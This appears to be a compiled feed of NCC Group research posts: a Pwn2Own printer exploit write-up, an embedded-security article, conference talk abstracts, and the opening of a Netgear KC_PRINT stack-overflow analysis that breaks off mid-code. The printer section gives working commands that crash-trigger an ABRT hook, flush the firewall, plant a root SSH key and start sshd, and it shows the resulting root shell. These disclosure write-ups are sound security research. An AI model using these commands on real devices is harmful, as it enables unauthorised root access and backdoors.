coredump_handler.conf     print_event.conf              uploader_event.conf

For instance, coredump_handler.conf shows how shell commands can be executed when a crash is handled:

# coredump-handler passes /dev/null to abrt-hook-ccpp which causes it to write
# an empty core file. Delete this file so we don't attempt to use it.
EVENT=post-create type=CCpp
    [ "$(stat -c %s coredump)" != "0" ] || rm coredump

The following excerpt from the ABRT documentation describes well how ABRT works:

If a program developer (or package maintainer) requires some specific information which ABRT is not
collecting, they can write a custom ABRT hook which collects the required data for his program
(package). Such hook can be run at a different time during the problem processing depending on how
"fresh" the information has to be. It can be run:

1. at the time of the crash
2. at the time when user decides to analyse the problem (usually run gdb on it)
3. at the time of reporting

All you have to do is create a .conf and place it to /etc/libreport/events.d/ from this template:

EVENT=<EVENT_TYPE> [CONDITIONS]
   <whatever command you like>

The commands will execute with the current directory set to the problem directory (e.g:
/var/spool/abrt/ccpp-2012-05-17-14:55:15-31664)

If you need to collect the data at the time of the crash you need to create a hook that will be run as 
a post-create event.

WARNING: post-create events are run with root privileges!

From the above we can determine we need a post-create event and we know it will be executed as root if/when a crash event is actually handled by ABRT.

Finding a process crash

There are several ways to crash a process, and it seems that a crash usually creates a blue screen of death (BSOD) and then the printer reboots.

Such a process crash is enough to trigger the ABRT behaviour. Once we have such a process crash, abrtd should trigger the post-create event of our controlled file. By starting our own process (e.g. netcat, ssh) that never returns, we can prevent the crash handling process from continuing, so it never results in a BSOD.

We abuse a bug in awk to trigger the crash. The version of awk used on the printer is quite old, so it has some bugs that don’t appear to exist in more modern versions. On the device, if an awk command is run on a non-existent file, an invalid free() can be triggered:

# awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' /tmp/doesnt_exist
free(): invalid pointer
Aborted

In order to trigger this remotely we abuse a race condition that exists due to the second-based granularity (%S format specifier) used for naming log files in apache2. The configuration has the following line:

ErrorLog "|/usr/sbin/rotatelogs -L '/run/log/apache_error_log' -p '/usr/bin/apache2-logstat.sh' /run/log/apache_error_log.%Y-%m-%d-%H_%M_%S 32K"

The above will trigger a log rotation for every 32KB of logs that are generated, with the resulting log file having a name that is unique only at a one-second granularity. As a result, if enough HTTP logs are generated that rotation occurs twice within one second, then two instances of apache2-logstat.sh may be processing a file with the same name at the same time. In apache2-logstat.sh we see the following:

#!/bin/sh
file_to_compress="${2}"
path_to_logs="/run/log/"
compress_exit_code=0
to_restart=0
rm -f "${path_to_logs}"apache_error_log*.tar.gz
if [[ "${file_to_compress}" ]]; then
echo "Compressing ${file_to_compress} ..."
tar -czf "${file_to_compress}.tar.gz" "${file_to_compress}"
compress_exit_code=${?}
if [[ ${compress_exit_code} == 0 ]]; then
echo "File ${file_to_compress} was compressed."
echo "Check apache server status if needed to restart"
to_restart=$(awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' "${file_to_compress}")
if [ $to_restart -gt "5" ]
then
echo "Time to restart apache .."
rm -f "${path_to_logs}"apache_error_log*
systemctl restart apache2
fi
rm -rf "${file_to_compress}"
else
echo "Error compressing file ${file_to_compress} (tar exit code: ${compress_exit_code})."
fi
fi
exit ${compress_exit_code}

Above, file_to_compress is the apache error log file generated per the ErrorLog line shown earlier. After compressing the file successfully, the awk command is run against the file to determine if apache should be restarted, and then the file is deleted. The problem arises when multiple instances of this script run at the same time: one instance deletes the log file from disk, and a second runs awk on the file that no longer exists, which triggers the crash noted above.

This crash can be triggered simply by sending a lot of HTTP traffic to the device.
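
A minimal sketch of what that can look like (URL and request count are purely illustrative):

import concurrent.futures
import urllib.request

def poke(_):
    try:
        # Any request that makes apache write error-log lines will do
        urllib.request.urlopen("http://192.168.1.4/does-not-exist", timeout=2)
    except Exception:
        pass  # errors are fine, we only care about log volume

with concurrent.futures.ThreadPoolExecutor(max_workers=32) as ex:
    ex.map(poke, range(5000))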

Although we used this awk crash to trigger code execution, any remote pre-auth crash should be usable as long as it triggers ABRT to run.

Putting it all together

We use our temporary file write primitive to create the /etc/libreport/events.d/abort_edg.conf file with the following content (padded with lots of spaces due to the requirements explained earlier):

EVENT=post-create /bin/ping 192.168.1.7 -c 4
        iptables -F
        /bin/ping 192.168.1.7 -c 4

We trigger a process crash, which causes ABRT to execute the commands above. We use interleaved ping commands to confirm when each intermediate command has been executed, and we confirm the 8 ping packets being received using Wireshark. Then, we are able to connect to a listening service on the printer that is normally blocked by the firewall, confirming the firewall has been successfully disabled.

The following ABRT hook file disables the firewall, configures SSH and starts it:

EVENT=post-create iptables -F
    /bin/rm /var/fs/security/ssh/ssh_host_key
    mkdir /var/run/sshd || echo foo
    /usr/bin/ssh-keygen -b 256 -t ecdsa -N '' -f /var/fs/security/ssh/ssh_host_key
    echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBABl6xVq6dGu40kDyxwjlMw7sxq4JGhVdc4hvDlDPPhzmAyEBkUWZOPRsLcWYm5kDJN6zFPTS0a4KNbx56qICwkyGAHfRv/+lVMxO2BEPJyYUUdpRC3qmUx0xy3GlgpOUUl90LgiifwcO6UI0P4l+UsewOrDdP6ycuklzJCaa7jLlPkMjQ==" > /var/fs/security/ssh/authorized
    /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
    while true; do /bin/ping 192.168.1.7 -c 4; sleep 10; done

The exploit in action:

$ ./MissionAbrt.py -i 192.168.1.4
(13:20:01) [*] [file creation thread] running
(13:20:01) [*] Waiting for firewall to be disabled...
(13:20:01) [*] [file creation thread] connected
(13:20:01) [*] [file creation thread] file created
(13:20:01) [*] [crash thread] running
(13:20:09) [*] Firewall was successfully disabled
(13:20:09) [*] [crash thread] done
(13:20:10) [*] [file creation thread] done
(13:20:10) [*] All threads exited
(13:20:10) [*] Waiting for SSH to be available...
(13:20:10) [*] Spawning SSH shell
Line-buffered terminal emulation. Press F6 or ^Z to send EOF.

id
ABRT has detected 1 problem(s). For more info run: abrt-cli list
root@<hostname>:~# id
uid=0(root) gid=0(root) groups=0(root)
root@<hostname>:~#

We see we started sshd under abrtd:

root@<hostname>:~# ps -axjf
...
   1  772  772  772 ?           -1 Ssl      0   0:00 /usr/sbin/abrtd -d -s
 772 2343  772  772 ?           -1 S        0   0:00  \_ abrt-server -s
2343 2550  772  772 ?           -1 SN       0   0:00      \_ /usr/libexec/abrt-handle-event -i --nice 10 -e post-create -- /var/fs/shared/svcerr/abrt/ccpp-2021-10-20-07:06:21-2117
2550 2947  772  772 ?           -1 SN       0   0:00          \_ /bin/sh -c echo 'mission abort!'             iptables -F             echo 'mission abort!'             /bin/rm /var/fs/security/ssh/ssh_host_key             echo 'mission a
2947 2952  772  772 ?           -1 SN       0   0:00              \_ /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
2952 3107 3107 3107 ?           -1 SNs      0   0:00                  \_ sshd: root@pts/0
3107 3109 3109 3109 pts/0     3128 SNs      0   0:00                      \_ -sh
3109 3128 3128 3109 pts/0     3128 RN+      0   0:00                          \_ ps -axjf

Final words on Pwn2Own

When participating at Pwn2Own, our first attempt failed due to an unknown SSH error that we had not encountered in our own testing environment. We could see that our commands got executed (the firewall was disabled and the SSH server was started/reachable), but it would not let us connect. Prior to the Pwn2Own event, during our exploit development, we had also tested a netcat payload, so we decided to start both payloads on the second attempt, which made us win. This shows that having backup plans is always useful when participating at Pwn2Own!

Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review

By: Jennifer Fernick

During October 2021, O(1) Labs engaged NCC Group’s Cryptography Services team to conduct a cryptography and implementation review of selected components within the main source code repository for the Mina project. Mina implements a cryptocurrency with a lightweight and constant-sized blockchain, where the code is primarily written in OCaml. The selected components involved the client SDK, private/public key functionality, Schnorr signature logic and several other related functions. Full access to source code was provided with support over Discord, and two consultants delivered the engagement with eight person-days of effort.

The Public Report for this review may be downloaded below:

Hardware & Embedded Systems: A little early effort in security can return a huge payoff

By: Rob Wood

Editor’s note: This piece was originally published by embedded.com

There’s no shortage of companies that need help configuring devices securely, or vendors seeking to remediate vulnerabilities. But from our vantage point at NCC Group, we mostly see devices when working directly with OEMs confronting security issues in their products — and by this point, it’s usually too late to do much. We root out as many vulnerabilities as we can in the time allotted, but many security problems are already baked in. That’s why we advocate so strongly for security early in the development process.

Product Development

Product development for an embedded system has all the stages you expect to find in textbooks. While formal security assessments are most common in the quality testing phase, there is a role for security in all phases.


Figure 1: Typical product design cycle

Requirements and Threat Modelling

We see major security problems introduced even during requirements gathering. Insufficient due diligence here can cause many issues down the line. Conversely, even a little effort at this point can have a huge payoff at the end.

Security Requirements

Functional requirements tell you everything your product is supposed to do, and how. Security requirements outline all the things your product is not supposed to do, and that’s equally important. Security testing occupies this gap, and it’s a vital part of the process.


Figure 2: Testing vs. security testing

Threat Modelling

To develop your security requirements[1],[2], you need a solid understanding of the threat model. Before you can even consider appropriate security controls and mitigations, you must define the product’s security objectives, and the types of threats your product should withstand, in as much detail as possible[3]. This describes all the bad guys who want to compromise your systems and devices, as well as those of your customers and users. They come in many forms:

  • Remote attackers using a wired or wireless network interface (if the device has such capabilities). These attacks can scale easily and affect many devices at once.
  • Local attacks that require the ability to run code on the device, often at a lower privilege level. Browser code or mobile apps are examples of such vectors.
  • Physical attackers with possession of the hardware. Lost or stolen devices, rogue administrators, temporary access through short-term rentals, and domestic abuse are all common examples. This issue is harder to solve, and the best recourse is to increase the cost for the attacker. That cost comes in two forms: the cost to develop an attack, and the cost to execute it. Increasing the first may help buy you time, but if the product is to have any longevity in the market, it’s better to concentrate on the latter. Sharing secrets across a fleet of devices is an all-too-common design pattern that leads to a near-zero execution cost (once the secret is known).

A reasonable baseline for nearly all modern products is to set the initial bar at “thousands of dollars,” which implies that an attack on the core chipset of the device is required. Anything less, and your product will very likely fall victim to a cheap circuit-level attack. Setting the bar this high should not reflect the product’s cost or price, but rather the value of the assets that the device must protect. Mass market devices like smartphones have had this level of security since at least the early 2000s. And that’s good — every aspect of our lives is accessed through our smartphones, so the cost for an attacker should be high.

A formal threat model is a living document that can be adjusted and consulted as needed throughout the product development cycle.

Platform Selection

Next, you need to select your building blocks: the platform, processor, bootloaders and operating system.

Processor

Most embedded systems are built around a core microcontroller, system-on-chip (SoC) or other CPU. For most companies this involves outsourcing and technical debt: Building connected consumer devices, industrial control systems or vehicle ECUs typically means selecting a chipset from a third-party vendor that meets cost, performance and feature requirements. But let’s not forget security requirements: Not all components are designed with security in mind, and careful evaluation will make this clear. Make sure it has the security features you need — cryptographic accelerators, hardware random number generator, secure boot or other firmware integrity features, a modern memory management unit to implement privilege separation and memory protections, internal fuse-based security configuration, and a hardware root-of-trust. It’s also important to ensure that it doesn’t have security traps you want to avoid. For example:

  • Ask the vendor to show you the security audit of the internal ROM(s).
  • Get details about the security properties of the provisioning systems.
  • Ask how they handle devices returned for failure analysis after debug functionality has been disabled (you’ll be surprised how many admit to having a backdoor).
  • Understand specifics about how the hardware boots the software, security properties of the ROM, bootloader, and firmware reference design.

One crucial aspect of any processor is that it must form a trust anchor: a root-of-trust that can validate the integrity of the system firmware for subsequent boot stages. This typically consists of an immutable first-stage bootloader (in ROM or internal flash), and an immutable public key (commonly programmed into fuses). While all other aspects of the system firmware can be validated, the root-of-trust is trusted implicitly.

Operating System

Next you need to choose a software stack to run atop the hardware and boot system provided by your chip vendor. There are many commercial and open source embedded operating system vendors to choose from, with different levels of security maturity: Linux/Android, FreeRTOS, Zephyr, MbedOS, VxWorks, and more. Many companies will even roll their own. Your chipset vendor will influence the selection with a shortlist of operating systems they support, and anything else means more work for you. The key criteria here are privilege separation, memory protection, capabilities and access controls, secure storage, and modern exploit mitigations. Also important is a vendor commitment to providing ongoing support on the hardware platform you’re using.

Application Runtime

At the application level, where you implement the bulk of the business logic, you again have choices. Most vulnerabilities are memory corruption-related, and they can be severe, even catastrophic. Fortunately, these are also among the few classes of vulnerabilities we know how to eliminate, by using modern memory-safe programming languages. If your platform supports such an environment, then applications should be written in Java, Go, Rust or Python. Where this is not possible, employ strong defensive programming and secure development lifecycle (SDLC)[4] techniques to reduce the risk of developer errors ending up in the released product.

Other

Once the requirements are laid out and major platform decisions have been made, the bulk of the design, implementation and testing phases of the product development process can move forward. Through the development cycle, continual security review with reference to the threat model (with updates as needed) will keep you on the right path.

A few other security measures deserve mention:

Patching

Patching and ongoing maintenance are crucial to the continued operation of your devices. Threats evolve rapidly as vulnerabilities are discovered and new attacker techniques are developed. Staying ahead of the bad guys requires that firmware updates be released on a regular cadence, and that adoption and installation of these patches be high. Automatic updates can make this extremely practical for most connected devices. Where safety considerations prevent automatic updates, or where users are otherwise involved in the update process, regular update behavior can sometimes be incentivized (e.g. Apple has frequently included new emoji collections with its security updates to encourage user adoption).

One challenge comes in the form of the technical debt you inherited when you outsourced your board support package. The chip business is sales-driven, and vendors have little incentive to maintain ongoing support for old devices and BSP versions. One way to help here is to ensure that ongoing security support is enshrined in the contract; otherwise, security becomes an afterthought.

Manufacturing and supply chain

If you are using a general-purpose microcontroller or SoC from a common vendor, you should expect the root-of-trust to be unconfigured until you provision it. This is where your manufacturing and production processes come into play — it is absolutely vital for these steps to be performed securely if your product is to rely on these bedrock security features[5]. However, there are strong incentives to outsource production to ODM or CM partners with low labor costs — the challenge is to ensure that your root-of-trust is securely configured even with potential threat actors in the factory[6].

Getting these processes in place early in the development cycle can be difficult, partly because secure firmware is likely to lag behind early hardware prototypes. Addressing them late can be equally difficult, because manufacturing is likely to resist process changes once they have a working recipe that produces widgets at the expected yield.

Repair and reverse logistics also likely require privileged access to your embedded devices. Ensuring that this privilege cannot be abused requires strong authentication on the calibration and configuration interfaces, and a careful understanding of the nuances of the production process for your specific devices.

Summary

Early threat modeling and the development of security requirements doesn’t have to be a burden, and it can save a great deal of time and effort if done at the right time. Incorporating input from your security experts will help you make the right platform choices and avoid the churn associated with repeated security fixes. Early engagement is far more effective.

References

[1] https://www.ioxtalliance.org/the-pledge

[2] https://ogi-cdn.s3.us-east-2.amazonaws.com/csis/firmware-security-best-practices-v1.1.pdf

[3] https://www.nccgroup.com/uk/our-research/security-of-things-an-implementers-guide-to-cyber-security-for-internet-of-things-devices-and-beyond/

[4] https://www.nccgroup.com/uk/our-services/cyber-security/specialist-practices/secure-development-cycle/

[5] https://www.nccgroup.trust/us/our-research/secure-device-provisioning-best-practices-heavy-truck-edition/

[6] https://www.nccgroup.trust/uk/our-research/secure-device-manufacturing-supply-chain-security-resilience/


Rob Wood is the VP for the Hardware and Embedded Security Services practice at cybersecurity consultancy, NCC Group. His career in embedded devices spans two decades, having worked at both BlackBerry and Motorola Mobility in roles focused on embedded software development, product firmware and hardware security, and supply chain security. Rob is an experienced firmware developer with extensive security architecture experience. His specialty is in designing, building, and reviewing products to push the security boundaries deeper into the firmware, hardware, and supply chain. He is most comfortable working with the software layers deep in the bowels of the system, well below userland, where the lines between hardware and software begin to blur. This includes things like the bootloaders, kernel, device drivers, firmware, baseband, trusted execution environments, debug and development tools, factory and repair tools, bare-metal firmware, and all the processes that surround them.

Tags: Design Methods, Security

✇NCC Group Research

Conference Talks – March 2022

By: Jennifer Fernick

This month, members of NCC Group will be presenting their work at the following conferences:

  • Juan Garrido, “Microsoft 365 APIs Edge Cases for Fun and Profit,” to be presented at RootedCon (March 10-12 2022)
  • Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google), “Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software,” to be presented at FOSS Backstage (March 17-18 2022)
  • Alma Rinasz, “You Got This: Stories of Career Pivots and How You Can Successfully Start Your Cyber Career,” to be presented at WiCys 2022 (March 17-19 2022)
  • James Chambers, “Reversing the Pokémon Snap Station without a Snap Station,” to be presented at ShmooCon (March 24-26 2022)

Please join us!

Microsoft 365 APIs Edge Cases for Fun and Profit
Juan Garrido
RootedCon
March 10-12 2022

Madrid, Spain

In this talk we describe and demonstrate multiple techniques for circumventing existing Microsoft 365 application security controls and how data can be exfiltrated from highly secure Microsoft 365 tenants which employ strict security policies.

That is, Microsoft 365 tenants with application policies to restrict access to a range of predefined IP addresses or subnets, or configured with Conditional Access Policies, which are used to control access to cloud applications. Assuming a Microsoft 365 configuration has enforced these types of security policy, we show how it can be possible to bypass these security features and exfiltrate information from multiple Microsoft 365 applications, such as OneDrive for Business, SharePoint Online, Yammer or even Exchange Online.


Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software
Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google)
FOSS Backstage
March 17-18 2022

Berlin, Germany + Virtual

Open source software is incredibly powerful – and while that power is often used for good, it can be weaponized when open-source projects contain software security flaws that attackers can use to compromise those systems, or even the entire software supply chains that those systems are a part of. The Open Source Security Foundation is an open, cross-industry group aimed at improving the security of the open source ecosystem. In this presentation, members of the OpenSSF Vulnerability Disclosure working group will be sharing with open-source maintainers advice on how to handle when researchers disclose vulnerabilities in your project’s codebase – and we’ll also take any questions you have about this often mysterious topic! 

Part 1 of this presentation will give an overview of the basics of Coordinated Vulnerability Disclosure (CVD) for open-source software maintainers, including some basics about security vulnerabilities, how to communicate securely and write patches without leaking vulnerability information, what you can expect during a disclosure with a researcher, and how to handle challenging scenarios like when you can’t patch, when a vulnerability is already being exploited by a threat actor in the wild, or when a vulnerability impacts many downstream dependencies.

Part 2 of this presentation will include a discussion about vulnerability disclosure best practices, pitfalls, and challenges. We will also welcome questions from the audience – ask us anything about dealing with vulnerabilities in open source!


You Got This: Stories of Career Pivots and How You Can Successfully Start Your Cyber Career
Alma Rinasz (NCC Group), Meghan Jacquot (Recorded Future), Jennifer Cheung (WiCyS), Jennifer Bate (Deloitte), Ashley S. Richardson (Palo Alto Networks)
WiCys Conference 2022
March 17-19 2022

Cleveland, OH

A panel of four women, none of whom started in cybersecurity and all of whom have successfully pivoted into the industry, will be moderated by another cybersecurity professional who also has her own story to share: she had a long career gap and then returned to cybersecurity. Emphasis and care were given to putting together a diverse panel with a variety of backgrounds and experiences, and a belief in #ShareTheMic. Two panelists are veterans and two panelists are BIPOC. Each panelist has her own story, but there are common threads of collaboration, curiosity, and determination. Questions have been carefully crafted in order to deliver a nuanced perspective to the audience. The hope is that conference attendees come away with takeaways regarding representation (they can see themselves in the panel) as well as concrete ideas for how to pivot (if applicable), start in cyber, and be successful in the industry. The panel will end with a question and answer session, so that attendees have time to ask any questions they might have, as well as the chance to network and get to know the panelists. All panelists are involved in WiCyS and in encouraging women in tech and women in cybersecurity, so part of the focus of the panel will be to encourage attendees that they too can be successful wherever they are in their journey. You’ve got this!


Reversing the Pokémon Snap Station without a Snap Station
James Chambers 
ShmooCon
March 24-26 2022
Washington, DC

Back in 1999 when the original Pokémon Snap was released for Nintendo 64, one of its coolest features was that you could head to a local Blockbuster and use a “Snap Station” to print out stickers of the photos you took in-game. Snap Stations are now rare collector’s items that few have access to, rendering the printing feature inaccessible.

Learning that they consisted of a Nintendo 64 console hooked up to a printer via video cables and a controller port, I set out to reverse engineer Pokémon Snap to see if I could restore the print functionality without access to the original kiosk hardware. This project involved a combination of software and hardware reverse engineering, facilitated by using an FPGA to make a physical link interface for Nintendo’s proprietary Joy Bus protocol. The resulting FPGA-based tool can also be used to simulate and interface with other peripherals, such as the Transfer Pak accessory which can be used to dump Game Boy cartridge data.

This presentation will demonstrate the reverse engineering and tooling processes, including tips on how hackers with a software background can go from following basic FPGA tutorials to creating real world hardware hacking tools.

✇NCC Group Research

BrokenPrint: A Netgear stack overflow

By: Alex Plaskett

Summary

This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched within the firmware update contained within the following Netgear advisory.

The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is in use, which means a printer is physically connected to the Netgear router through a USB port. No configuration changes need to be made, so the default configuration is exploitable as soon as a printer is connected to the router.

This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.

Our exploitation method is very similar to the one used in the Tokyo Drift paper, i.e. we chose to change the admin password and start the utelnetd service, which allowed us to then get a privileged shell on the router.

We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.

Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.

We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French, which means "broken" in English.

Vulnerability details

Background on ReadySHARE

This video explains well what ReadySHARE is: it basically allows access to a USB printer through the Netgear router as if the printer were a network printer.

Reaching the vulnerable memcpy()

The KC_PRINT binary does not have symbols, but it has a lot of logging/error functions which contain function names. The code shown below is decompiled code from IDA/Hex-Rays, as no open-source code has been found for this binary.

The KC_PRINT binary creates lots of threads to handle different features:

The first thread handler we are interested in is ipp_server() at address 0xA174. We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection() at address 0xA4B4 and passes the client socket to this new thread.

void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init(&attr);
  pthread_attr_setdetachstate(&attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR, &optval, 4u) < 0 )
  {
    ...
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *)&sin, 0x10u) < 0 )
  {
    ...
  }

  // accept up to 128 clients simultaneously
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock, &addr, &addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock(&g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock(&g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                    &g_client_threads[thread_index],
                    &attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock(&g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy(&attr);
  pthread_exit(0);
}

The client handler calls into do_http at address 0xA530:

void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled && !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}

The do_http() function reads an HTTP-like request until it finds the end of the HTTP headers (\r\n\r\n) into a 1024-byte stack buffer. It then searches the URI for a POST /USB prefix followed by an _LQ string, and parses the integer usblp_index found between the two. It then calls into is_printer_connected() at 0x16150.

The is_printer_connected() function won’t be shown for brevity, but all it does is open the /proc/printer_status file, read its content, and try to find a USB port by looking for a string like usblp%d. Such a string will only be found if a printer is connected to the Netgear router, meaning execution never continues further if no printer is connected.

unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continue\r\n\r\n");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));

  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continue\r\n\r\n"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);                 
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )                    
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;

It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on the values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0, which is the function we are interested in.

  // /!\ does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "\r\n");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2) && (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...

The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copies in the 8 bytes already read, and reads the remaining bytes into that new heap buffer.

Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.

Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in Response_Get_Jobs() at 0x102C4, which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows, but Response_Get_Jobs() seemed the most straightforward to exploit, so we targeted this function.

unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
}

The first part of the vulnerable Response_Get_Jobs() function code is shown below:

// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
